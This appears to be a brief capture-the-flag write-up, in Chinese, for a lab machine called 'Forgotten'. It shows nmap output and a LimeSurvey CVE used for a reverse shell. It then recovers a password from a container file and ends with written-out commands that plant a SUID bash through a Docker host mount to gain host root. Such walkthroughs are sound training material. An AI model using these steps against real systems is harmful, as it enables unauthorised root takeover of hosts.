Forgotten

nmap扫一下：

┌──(root㉿kali)-[~]
└─# nmap -A -T4 10.129.234.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-28 00:23 EST
Nmap scan report for 10.129.234.81
Host is up (0.43s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 28:c7:f1:96:f9:53:64:11:f8:70:55:68:0b:e5:3c:22 (ECDSA)
|_  256 02:43:d2:ba:4e:87:de:77:72:ce:5a:fa:86:5c:0d:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 403 Forbidden
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   175.48 ms 10.10.16.1
2   117.37 ms 10.129.234.81
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.01 seconds

有一个 80 端口开着，不过进去是403。感觉挂了一个Apache应该是有web服务的。

扫一下目录，发现 /survey 端口，需要安装，拉一个mysql下来。

1 2	sodu docker pull mysql:8.0 sudo docker run -p 3306:3306 --rm --name tmp-mysql -e MYSQL_ROOT_PASSWORD=password mysql:8.0

安装之后直接按照版本号找cve：

找到：CVE-2021-44967，能直接拿到一个反弹shell。

进来之后 ifconfig，网段是：172.17.0.0/16，并且还有 dockerenv这些东西，基本确定现在就在docker中了。

看一下 .dockerenv，里面抓到一个密码：

1	5W5HN4K4GCXf9E

连一下ssh看一下：

1	ssh limesvc@10.129.234.81

没root，考虑docker挂载。

回到反弹shell去，建立一个交互式shell：

1	/usr/bin/script -qc /bin/bash /dev/null

想办法在docker里提权：

sudo -l

发现是 ANY，那不直接提权了，直接找挂载就行。

#docker容器内
cd /var/www/html/survey
touch testtest
 
#宿主机
find / -name "testtest"

传bash并上SUID位：

1
2
3

echo 5W5HN4K4GCXf9E | sudo -S cp /bin/bash .
echo 5W5HN4K4GCXf9E | sudo -S chmod +x bash
echo 5W5HN4K4GCXf9E | sudo -S chmod u+s bash

直接 bash -p 拿到宿主机 root。